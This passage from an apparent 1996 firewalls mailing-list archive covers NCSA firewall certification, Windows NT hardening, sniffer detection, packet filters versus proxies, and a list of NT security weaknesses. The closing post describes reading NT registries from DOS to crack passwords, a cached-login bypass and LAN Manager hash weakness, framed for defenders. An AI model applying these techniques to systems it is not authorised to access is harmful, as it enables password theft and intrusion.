prolonging this discussion further, I'd like to point out that if this quote is accurate (from one of CMH's posts, I think): + According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this + regard like a government agency for the commercial sector." (Communications + Week. June 17). then NCSA, if it is a 501-C tax-exempt US trade association, may be in a world of trouble with respect to US anti-trust laws. Gary Flynn and his company might get a better ROI if, instead of joining NCSA and whining in this forum about their certification program, they spent the same kind of time, energy and money talking to one of the many DC law firms that does a lot of competitive restraint-of-trade work. With treble damages and criminal penalties at risk, behaviors can influenced much more quickly than with a PR campaign. +-------------------------------------------------------------------+ | Dan Murphy, CWA Communication Products | email: dmurphy@cwa.com | | 401 Alberto Way, Los Gatos, CA 95032 | voice: 408-358-1529 | | (Nihon-go wa mada jouzo ja arimasen.) | faxen: 408-356-7061 | +-------------------------------------------------------------------+ From firewalls-owner Mon Jul 1 10:45:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA05475 for firewalls-outgoing; Mon, 1 Jul 1996 09:50:31 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA05435 for ; Mon, 1 Jul 1996 09:50:13 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB674A.C4294360@rwcooper.rc.toronto.on.ca> From: Russ To: David LeBlanc Cc: "firewalls@greatcircle.com" Subject: RE: NT Backoffice "Catapult" firewall certified? Date: Mon, 1 Jul 1996 12:42:28 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I promise not to drag this thread out any longer than it absolutely has to, but a couple of generalizations by John Betts need to be addressed. "Not every person who puts NT boxes (or any other unix box for that matter) on the Internet knows about things like disabling guest account, setting permissions on shares correctly, etc." This is unfortunately true, but I fail to see its relevance in this discussion. Basically, you are saying that people don't know/aren't interested in properly securing their boxes (any OS) despite putting them in risky environments, which is one of the reasons this list exists, so we all knew that one already. The basics, like disabling guest privileges, setting permissions on shares correctly, etc. are just that, basics. "My main point against NT firewalls is the following: _as a general rule_ people who want NT firewalls, want them because any tom, dick and harry can get them going, without extensive knowledge of security and tcp/ip." Funny, but isn't it true to say that anyone who goes out and buys any firewall is doing so because they don't want (don't have the time) to have to learn everything that the firewall vendor learned about security and tcp/ip? Isn't the whole idea behind a purchased firewall that it should make it easier to get them going rather than programming it all yourself? A Borderware firewall gets plugged in, installed (which any tom, dick, or harry could do), and is up and running, with all ports closed. A couple of menu selections later and your site has HTTP, SMTP, FTP, NNTP access to the Internet, securely. Any idiot could set up a Borderware firewall, with no real understanding of either security or tcp/ip (no more than any other machine where you have to configure a network stack). Same holds true for many of the commercial Firewalls available today. This is not an NT-thing!!! Personally, I believe that people who want to buy an NT-based Firewall are simply trying to provide a consistent inter face to their client environment. Probably the single most important reason I can think of is integration with an existing user database, thereby avoiding having to have multiple databases to administer. The old "single sign-on" thing. Truth be told, getting an NT-based Firewall does not translate to "single sign-on", there are far better methods (like ACE) to achieve that goal. However, if you're environment doesn't include Unix boxes or large servers (a.k.a. mainframes), an NT-based Firewall may make administration considerably easier. "I have no problem with firewalls that are so easy to administer,etc, BUT, generally, the people who setup these easy-to-use firewalls, dont know/think about things like disabling guest account (I know, lame example), or setting permissions on shares (or disabling all shares, or whatever), etc, and if the firewall software dosnt do this for them, then their firewall host can be easilly compromised...." I don't know of any NT-based Firewall product available today that does not do the things you are talking about during its installation, and I've looked at more than most. The statement would imply that you have seen an NT-based Firewall that doesn't do this, and if so, which one, I want to know? What you are implying is that the designers of *some* NT Firewall products do not know about these basic security steps. I have not seen an NT Firewall which can be installed *insecurely*. Products like WinGate, or Catapult, are not Firewalls, but proxy servers, and while their security is no less important than that of a firewall, they are both designed to run with other applications on an NT-box (WinGate wasn't specifically designed for NT, but will run on NT). As such, neither impose a security model on the installer and instead leave it up to the installer to decide what to do to secure the box properly. Both can be installed *insecurely*, such that the box can be compromised. "It takes time and knowledge (well, more like common sense) to make an NT box secure(ish). We all know that a large majority of ppl who insist on NT because of its ease of use, and requirement for little-to no knowledge of system administration and security, dont have the time and knowledge to secure their box." Again, this generalization applies to all computers, period. I personally don't think that there is a large majority of people who are insisting on NT because of its ease of use, and requirement for little-to no knowledge of system administration and security. If that was true, it wouldn't be so difficult to find people who are good at NT. NT's administrative model is no less complex than Novell's, or Banyan's, and in some cases it can be far more complex (due to the lack of Directory Services). By default, both NT and Novell are very wide open after an initial installation, so NT doesn't simplify the security either. I would counter your generalization with one of my own. A large majority of people who are administering NT do have the ability to properly secure a large majority of the security requirements of an NT environment. Its sad, but true, that many companies do not give their administrative IS staff enough time to properly configure that security or properly construct a viable security policy, irregardless of the OS involved. "I hope that I did not offend or mislead anyone here." Offend, definitely not. Mislead, you continue to do so...;-] "if so, I'm sorry, and you are welcome to flame my procmail^H^H^H^H^H^H^H^Hme ;-)" Well, here goes...;-] Cheers, Russ From firewalls-owner Mon Jul 1 11:10:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA07998 for firewalls-outgoing; Mon, 1 Jul 1996 10:17:28 -0700 (PDT) Received: from scc.net (scc.net [204.220.33.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA07966 for ; Mon, 1 Jul 1996 10:17:14 -0700 (PDT) Received: from 204.220.33.101 (port-1.scc.net [204.220.33.101]) by scc.net (8.6.12/8.6.10) with SMTP id MAA11949 for ; Mon, 1 Jul 1996 12:14:21 -0500 Message-ID: <31D8073E.2CF7@tsg-usa.com> Date: Mon, 01 Jul 1996 12:13:34 -0500 From: "Urban A. Haas" Reply-To: uhaas@tsg-usa.com Organization: Total Solutions Group X-Mailer: Mozilla 2.02 (Macintosh; I; 68K) MIME-Version: 1.0 To: Firewall Mailing List at Great Circle Subject: Re: Network ethernet sniffer References: <31D8069C.1A52@tsg-usa.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ben wrote: > > > is it possible to detect if a machine and then which machine might be > > sniffing the network if the machines are about 60 - 70 on that subnet. > > It would be good to know if it is possible and then how if someone knows. You can usually do this on Token-ring, but not Ethernet. It just isn't designed in there. > > You can use programs to detect if there are any ethernet adaptors in > promiscuous mode. > This also isn't a good test, but it's a start. Some *IX machines go into promiscuous mode to automatically build arp caches, do dpli (for IPX or NetBIOS) and other things. -- Urban A. Haas | Total Solutions Group | Open Systems & Network Consultant | (612) 831-8320 x133 | Internet: uhaas@tsg-usa.com | mailto:uhaas@tsg-usa.com -or- | mailto:uhaas@aol.com | From firewalls-owner Mon Jul 1 11:28:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA16691 for firewalls-outgoing; Mon, 1 Jul 1996 11:12:11 -0700 (PDT) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA16682 for ; Mon, 1 Jul 1996 11:12:02 -0700 (PDT) Received: by relay.ashton.csc.com; id OAA25509; Mon, 1 Jul 1996 14:10:27 -0400 Received: from ckostick.sed.csc.com(20.2.53.154) by relay.ashton.csc.com via smap (g3.0.1) Received: by ckostick.sed.csc.com with Microsoft Mail Message-ID: <01BB6756.EB0A74C0@ckostick.sed.csc.com> From: Chris Kostick To: "firewalls@GreatCircle.COM" Subject: RE: NCSA Certification Date: Mon, 1 Jul 1996 14:09:27 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dan Murphy x286[SMTP:dmurphy@cwa.com] wrote: > > At the risk of prolonging this discussion further, I'd like to point out > that if this quote is accurate (from one of CMH's posts, I think): > > + According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this > + regard like a government agency for the commercial sector." (Communications > + Week. June 17). > > then NCSA, if it is a 501-C tax-exempt US trade association, may be in a > world of trouble with respect to US anti-trust laws. Gary Flynn and his > company might get a better ROI if, instead of joining NCSA and whining in > this forum about their certification program, they spent the same kind of > time, energy and money talking to one of the many DC law firms that does > a lot of competitive restraint-of-trade work. With treble damages and > criminal penalties at risk, behaviors can influenced much more quickly > than with a PR campaign. And with this posting, we have officially gone off the deep end. -- Chris From firewalls-owner Mon Jul 1 11:34:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA15238 for firewalls-outgoing; Mon, 1 Jul 1996 11:00:45 -0700 (PDT) Received: from dns.ottawa.net (dns.ottawa.net [205.211.4.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA15213 for ; Mon, 1 Jul 1996 11:00:36 -0700 (PDT) Received: from slip-ppp17.ottawa.net (slip-ppp17.ottawa.net [205.211.5.17]) by dns.ottawa.net (8.7.5/1.2) with SMTP id NAA01778; Mon, 1 Jul 1996 13:57:42 -0400 (EDT) Date: Mon, 1 Jul 1996 13:57:42 -0400 (EDT) Message-Id: <199607011757.NAA01778@dns.ottawa.net> X-Sender: bjm@ottawa.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: CMH@Interramp.com From: bjm@ottawa.net (Brian McIntosh) Subject: Re: NCSA Certification Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I think you're all missing the point. > Corey, perhaps you're the one who's missing the point rather than all of us. NCSA is a private organization and they can establish firewall criteria if they feel like it. Adherence by vendors as well as acceptance by users is purely voluntary. There are no laws or statutes that say a vendor must test / comply nor are users forced by to only buy an NCSA-certified firewall. If a vendor chooses to participate and a user willingly accepts the certification process as having merit, then so be it - this is the basis of the free market system. Similarily, you have every right to not participate in, or accept, the process but you shouldn't expect the whole netsec community to necessarily agree with your position. This too, is a matter of free choice. > > I don't believe the UL is a for-profit organization nor is any vendor's product > not acceptable for testing. > U.L. is a private organization founded in 1894 by William H. Merrill. Vendors pay U.L. for evaluating their products and this is the organization's principle source of revenue. If a vendor is willing to pay the fee, U.L. will test. ======================================================== Brian J. McIntosh UniSol Inc. 53 Courtney Road Tel: 613 831 6373 Kanata, Ontario Fax: 613 831 4739 Canada, K2L 1M1 Email: bjm@ottawa.net ======================================================== From firewalls-owner Mon Jul 1 12:15:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13318 for firewalls-outgoing; Mon, 1 Jul 1996 10:50:44 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13015 for ; Mon, 1 Jul 1996 10:49:39 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA08358; Mon, 1 Jul 1996 12:46:50 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id MAA15413; Mon, 1 Jul 1996 12:31:17 -0500 Received: by sonic.nmti.com; id AA26472; Mon, 1 Jul 1996 12:31:16 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607011731.AA26472@sonic.nmti.com.nmti.com> Subject: Re: NT Backoffice "Catapult" firewall certified? To: Russ.Cooper@RC.Toronto.on.ca (Russ) Date: Mon, 1 Jul 1996 12:31:16 -0500 (CDT) Cc: johnb@aztec.co.za, firewalls@GreatCircle.COM In-Reply-To: <01BB66C2.56E11220@rwcooper.rc.toronto.on.ca> from "Russ" at Jun 30, 96 08:25:47 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've been securing Windows NT for almost 5 years now, and while there are > some environments which I admit are almost impossible to properly secure > (access to NT through WinDD, Citrix, or some other terminal-emulation-like > server-based environment...thanks to Pete Da Silva) Or any other situation where more than one user shares an NT workstation, including kiosk type access to general applications (such as a public print shop, computer lab, hotelling, ...), so it's not really fair to simply dismiss this so blithely as a side effect of third party software. NTFS is a reasonably good file system and NT provides all the hooks to make shared use of hardware as secure as it is in UNIX. The problem is that it's extremely difficult to simultaneously secure the system and actually allow users to log in and run applications, because of the way Windows software works... in fact, Microsoft is still telling application vendors to have their programs put files in system directories, and doing so themselves. I am but secure north by northwest, when the wind is from the south I can't tell a hack from a hacksaw. *sigh* From firewalls-owner Mon Jul 1 12:20:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20051 for firewalls-outgoing; Mon, 1 Jul 1996 11:43:09 -0700 (PDT) Received: from typhoon.dial.pipex.net (typhoon.dial.pipex.net [158.43.128.46]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA19996 for ; Mon, 1 Jul 1996 11:42:48 -0700 (PDT) Received: from unknown by typhoon.dial.pipex.net (8.7.4/) Message-ID: In-Reply-To: References: Conversation with last message To: Corey "M." Horowitz Cc: firewalls@GreatCircle.COM MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: NCSA Certification Date: Mon, 01 Jul 96 19:38:43 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > At 08:34 AM 7/1/96, gary flynn wrote: > >> I think some important important questions need to asked: > >> > >> 1. Who appointed the NCSA as the proper body to approve firewalls? > >> > > > >I think your questions are valid but I think the underlying > >principle is "lead, follow, or get the hell out of the way" :-) > Corey responded in part: > > I think you're all missing the point. I have no problem with the concept > of the NCSA or any other responsible body acting as a protector of the > public interest in insuring that all firewall products deliver the security > promised or, at a minimum, necessary to adequately protect our networks. > The mission statement is admirable. The execution is faulty. > I think the real point is that a load of small groups are trying to establish themselves as certification authorities on security. There are also the national and international initiatives backed by governments. OK US NCSC may have been too restricted in the past. ITSEC addressed most of the major issues, and we are all supposed to be backing Common Criteria. None of those schemes are perfect, but one of the reasons for that is that vendors and users outside government have been very slow to join the party. Thats meant that criteria have been driven by academics and government officials and they dont have a really good understanding of what drives commercial enterprises. Rather than sulk off and try to set up many competitive partial schemes, it would be more productive to participate in the major schemes which are well established and try to improve them. I personally have a few reservations about Common Criteria, but it does offer the prospect of a true international criteria, its based on ITSEC, which was in turn an improvement based on TCSEC, and is well worth actively supporting and changing from within. WRT the nasty commercial issues, no one does anything for free. TCSEC certifications cost money, ITSEC requires the vendor to pay for evaluation time at commercial rates, Common Criteria wont be for free. The major differences between NCSA certification and say ITSEC are: 1. NCSA are charging a membership fee which is less than 25% of what it would cost for an ITSEC evaluation of a firewall at E2 or E3. If NCSA prove to do as good as or better evaluation job then they have commercial advantage. Probability though is that their evaluation will be trivial by comparison - if not they are sure to say so on this forum. 2. ITSEC is open (and has been since 1990) to anyone who wants to submit a product and pay for the evaluation. You dont have to be a member of the club. Also the criteria is public domain and the evaluators and certifiers are not only independent of the vendor, but of eachother - you cant get much more equal than that. 3. National and international legislation will be based on ITSEC and CC rather than on trade groups like NCSA. Ian J-B. From firewalls-owner Mon Jul 1 12:24:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA19355 for firewalls-outgoing; Mon, 1 Jul 1996 11:36:32 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA19293 for ; Mon, 1 Jul 1996 11:36:10 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB6759.B1C8D5A0@rwcooper.rc.toronto.on.ca> From: Russ To: "'Peter da Silva'" Cc: "johnb@aztec.co.za" Subject: RE: NT Backoffice "Catapult" firewall certified? Date: Mon, 1 Jul 1996 14:29:19 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I didn't make it clear in my message, but I was referring to securing an NT Server, not an NT Workstation. "Or any other situation where more than one user shares an NT workstation, including kiosk type access to general applications (such as a public print shop, computer lab, hotelling, ...), so it's not really fair to simply dismiss this so blithely as a side effect of third party software." First of all, the issue was raised about the ability to secure an NT Server for Internet use as a Firewall. This situation is definitely not one where we are talking about multiple users sharing the machine for access to general applications. In an attempt to show that NT is *not* all things to all men, I used an example that certain configurations of an NT server are virtually impossible to secure. This was not an attempt to isolate a single third party vendor, but merely a statement of fact of which I am personally familiar. The fact that many *existing* Windows-based applications cannot be properly secured on an NT box that is going to be logged into locally by multiple users is a valid extension of my example. Securing an NT box for multiple users locally (i.e. not network access but actually sitting down in front of the box and using its keyboard, or, in the case of Citrix-like applications, doing so through remote emulation), can be very complex and in some cases impossible. It all depends on the applications that *must* run on the box. Almost all *NT-specific* user applications comply with the profile model and can be installed appropriately. Arcada's Backup Exec is one good example. I don't think I am blithely dismissing anything. If your workstations are running server-based installations of Office, you can secure them properly. Word, Excel, etc. can all be installed on a shared machine running from a server such that they are secure enough to prevent attacks, even Trojans. This presumes that the clients are NT as well, in which case application profiles can be secured by individual user ID. Write access is not necessary to their shared components once the application has been installed. The need to maintain write access to a shared component is not mandated by NT, but by the application. There is a big difference between a network installation of Office and a local installation. Remember, also, that there is an NT-specific version of Word and Excel which do properly understand profiles. So, you're right Pete, but...;-] Cheers, Russ From firewalls-owner Mon Jul 1 12:25:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA22056 for firewalls-outgoing; Mon, 1 Jul 1996 12:00:54 -0700 (PDT) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA21987; Mon, 1 Jul 1996 12:00:44 -0700 (PDT) Message-Id: <199607011900.MAA21987@miles.greatcircle.com> Received: by habanero.jmu.edu Date: Mon, 1 Jul 1996 14:57:48 -0400 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: NCSA Certification Cc: CMH@Interramp.com, gary@habanero.jmu.ed Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > then NCSA, if it is a 501-C tax-exempt US trade association, may be in a > world of trouble with respect to US anti-trust laws. Gary Flynn and his ^^^^^^^^^^ > company might get a better ROI if, instead of joining NCSA and whining in > this forum about their certification program, they spent the same kind of Just to set the record straight, my response to SOMEONE ELSE's concerns (I won't say whines) about the certification process was that I saw it as a "lead, follow, or get out of the way" decision. I won't say "whine" because if I had a company that developed firewall products I think I'd be justifiably concerned along the same lines as the original poster's questions. Gary Flynn Network Manager James Madison University From firewalls-owner Mon Jul 1 12:41:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23086 for firewalls-outgoing; Mon, 1 Jul 1996 12:10:48 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA23044 for ; Mon, 1 Jul 1996 12:10:33 -0700 (PDT) Received: from ragans-laptop (atl-dynamic4.ins.com [199.0.194.4]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id MAA20349; Mon, 1 Jul 1996 12:07:05 -0700 (PDT) Message-Id: <2.2.32.19960701182006.00f95000@lexicon.ins.com> X-Sender: ragan@lexicon.ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 01 Jul 1996 13:20:06 -0500 To: "Russell L. Jones" From: Charles Ragan Subject: Re: Cisco Router security Cc: "'firewalls@GreatCircle.COM'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can read about it below; http://www.cisco.com/warp/customer/707/2.html Charles At 12:38 PM 7/1/96 -0400, Russell L. Jones wrote: >What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks? > > > > > > > > >Russell L. Jones > > > ______________________________________________________________ Charles Ragan, Jr. International Network Services CCIE #1764, MCSE, MCNE, CBE Pager - 1-800-INS-1-INS Using NT Server 4.0 Beta2 & Eudora 2.2(32) ______________________________________________________________ From firewalls-owner Mon Jul 1 13:29:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA01829 for firewalls-outgoing; Mon, 1 Jul 1996 13:16:21 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA01811 for ; Mon, 1 Jul 1996 13:16:11 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607012013.AA21341@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Peter da Silva Cc: Mike Shaver , avalon From: Ryan.Russell/SYBASE Date: 1 Jul 96 13:13:23 EDT Subject: Re: Stateful Packet Screens X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would not disagree that ALGs would probably allow one to more easily filter stuff in the datastream (i.e. yank out stuff between the tags.) This is because , by their nature, many of them store a signifcant portion of the document on it's way through, and hence, would make it easier to run through some script on the proxy server. This would also be why they would tend to be slower. Please correct me if I'm wrong, I'm no proxy expert. I've only used CERN and Socks proxies. And I didn't administer them. I suppose the upshot would be that web proxies could cache today's Dilbert if you wanted. I agree that you could probably do the same with the SPFs on the market today, but I wouldn't want to try. I'm not sure about the security point.... If your assumption is that being able to parse datastreams makes for better security, I suppose that could be correct. I think it might be a difference of opinion though.. as I've mentioned on the list before, I am not about to attempt to catch viruses and evil applets on their was in through the firewall. I think that is a losing battle. I would rather have good antivirus and a fixed Netscape on the host on the inside. I definately disagree on the administrative convenience point. I have/had a socks proxy, and haveing a transparent SPF in MUCH easier for me. Granted, it was Socks 4, but even so. I suspect that one will have a much easier time allowing a new type of service on a SPF than an AG. The SPF I have (FW1) will automatically allow some new service out of the box, if the network transaction is simple enough (i.e. a simple TCP transaction.) That may or may not be a good thing. I prefer to let my users access as many toys as will work through the firewall. I'll let you know if I change my mind when we use up our bandwidth. Are there proxies that are as transparent as something like FW1? If not, how can you say that having to set proxy entries on all your inside hosts on a per-app basis is administrativly easier? Ryan ---------- Previous Message ---------- To: shaver cc: avalon, chris, Firewalls From: peter @ baileynm.com (Peter da Silva) @ smtp Date: 07/01/96 08:37:28 AM Subject: Re: Stateful Packet Screens > As Darren pointed out, it's possible to do everything an AG does with > an SPS, and vice versa. However, in practical terms, you can't get a stateful packet filter that will do all the stuff even the simplest application level gateways do as a matter of course, and for a simple configuration it's much easier to get the existing ALGs configured right than the existing SPFs. In theory, you and Darren are correct. In practice, existing implementations do fall into clumps with user convenience and performance being highest for packet filters, and administrative convenience and security being highest for proxies. From firewalls-owner Mon Jul 1 15:36:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA04881 for firewalls-outgoing; Mon, 1 Jul 1996 14:55:59 -0700 (PDT) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA04874 for ; Mon, 1 Jul 1996 14:55:50 -0700 (PDT) Received: by mercury.Sun.COM (Sun.COM) Received: from sunesc.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) Received: from breakers.East.Sun.COM by sunesc.East.Sun.COM (SMI-8.6/SMI-SVR4) Received: by breakers.East.Sun.COM (SMI-8.6/SMI-SVR4) Date: Mon, 1 Jul 1996 17:52:23 -0400 From: ericj@breakers.East.Sun.COM (Eric Johnson) Message-Id: <199607012152.RAA12553@breakers.East.Sun.COM> To: firewalls@greatcircle.com Subject: ftp PASV risks? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Can someone tell me what security risks are associated with allowing PASSV ftp? I've got a few ideas, but I'd like to hear from the experts. Please send mail to me directly, as well as to the list. (I didn't mail my check to SiCk PuPpY promptly, so my subscription has lapsed.) Thanks in advance, Eric From firewalls-owner Mon Jul 1 15:48:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA04619 for firewalls-outgoing; Mon, 1 Jul 1996 14:51:24 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA04609 for ; Mon, 1 Jul 1996 14:51:17 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607012148.AA24761@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Peter da Silva Cc: firewalls From: Ryan.Russell/SYBASE Date: 1 Jul 96 14:48:37 EDT Subject: Re: Stateful Packet Screens X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why "low security" end of the spectrum? Because SPF tends to support more app types? I don't believe in restricting the kind of data that users can access a reasonable form of security. Besides, they will always find a way around it. Do you think that proxies that support essentially Telnet, FTP, and HTTP are more secure than other solutions that support more? In theory, yes, less data attacks to worry about.. in practice, all the interesting data attacks are coming through HTTP anyway. And, it's quite easy for me to deny a particular service should I choose to. Just as easy as it would be on a proxy, I would expect. What kind of proxy do you use? Why couldn't a proxy be transparent? Is anyone out there doing anything with, say a web proxy, besides just passing the HTML document through? Is anyone getting any value while taking the speed hit and having to configure your clients special? Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: firewalls From: peter @ baileynm.com (Peter da Silva) @ smtp Date: 07/01/96 03:53:06 PM Subject: Re: Stateful Packet Screens > I definately disagree on the administrative convenience point. I have/had > a socks proxy, and haveing a transparent SPF in MUCH easier for me. That depends on what your security policy is. If it's "allow anything if it's initiated on the inside" then a packet filter is definitely easier than SOCKS. But then you're tending towards the "low security" end of the spectrum to begin with. > Are there proxies that are as transparent as something like FW1? If there are, they're not doing anything more than a packet filter. From firewalls-owner Mon Jul 1 16:04:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA10379 for firewalls-outgoing; Mon, 1 Jul 1996 15:34:36 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA10370 for ; Mon, 1 Jul 1996 15:34:29 -0700 (PDT) Received: by hidata.com; id AA12388; Mon, 1 Jul 96 15:31:43 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Mon, 1 Jul 1996 15:31:30 -0700 Message-Id: <199607012231.PAA23368@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: dnewman@mcgraw-hill.com From: Bill Stout Subject: Re: NT security--Bill Stout's list Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:09 AM 7/1/96 edt, dnewman@mcgraw-hill.com wrote: > >Russ Cooper writes: > >>> "Because NT has even more security holes than Irix *duck*, I wont list >>> them here," > >>Its interesting that you should say this. Bill Stout put a very good list >>together, but a number of those issues can be addressed. . . > > Russ, can you please post a URL for this list? TIA. > > Regards > David Newman The following is a small list of 'concerns' I had posted to 'NT security' in administering my own domain, with additional comments. Hackers already know these, so protect your systems: Is it possible to hack a connect onto a NT fileservice from the network? There _must_ be holes: 1. I know DOS and Linux have drivers which allow you to RWED files on an NTFS disk, if the disk is in the same machine. Comment: Some have stated only read is possible with the NTFSDOS.EXE driver. I heard that a write-capable driver does exist, and if not, making a write capable driver is trivial once you can read the disk. Either way you can read the registry and files, then run crack. 2. I accidently had full access to all files once on an NT 3.51 server w/service pack 3, when I first started up NT 4.0b1 client on my network. Using any account I accessed all protected files and directories. I even double-checked permissions to see if I was really browsing a directories that only had user privileges. I haven't had time to duplicate it, but quickly fixed the problem (applied SP4) after I picked my jaw off the floor! Comment: I would appreciate it if someone with NT3.51 SVR sp3 could load NT4.0 WS (b1/b2?) to see if this happens, and e-mail me. 3. NT Workstations having the wrong challenge response can have a user login using cached data with the network cable disconnected (bypassing 'netlogon' service). When the cable is reconnected, all services (and network files) are available. I found this after someone installed a duplicate domain, the clients authenticated on the wrong domain, and wouldn't connect on the correct one, except for disconnect-logon-reconnect process. Comment: This is like bypassing NIS+ by unplugging the cable/Internet for a second. The CIFS/1.0 draft RFC by MS has some interesting comments about passwords in section "8.3 LANMAN 2.1 (and earlier) Challenge/Response", and in the sections that follow. See: ftp://ietf.cnri.reston.va.us/internet-drafts/draft-heizer-cifs-v1-spec-00.txt 4. NT MSV1.0 encrypts user password in RSA MD-4, but compromises the password by also encrypting the password in Lan Manager DES compatible mode. Then transmits the same password in both encrypted formats. For Lan Manager compatibility, of course. Comment: NT uses only RSA MD-4 when the password is longer than 14 characters. None of the existing NT user interfaces allow > 14 characters. The password is encrypted and exchanged as a 16-byte data string, which is compared to the 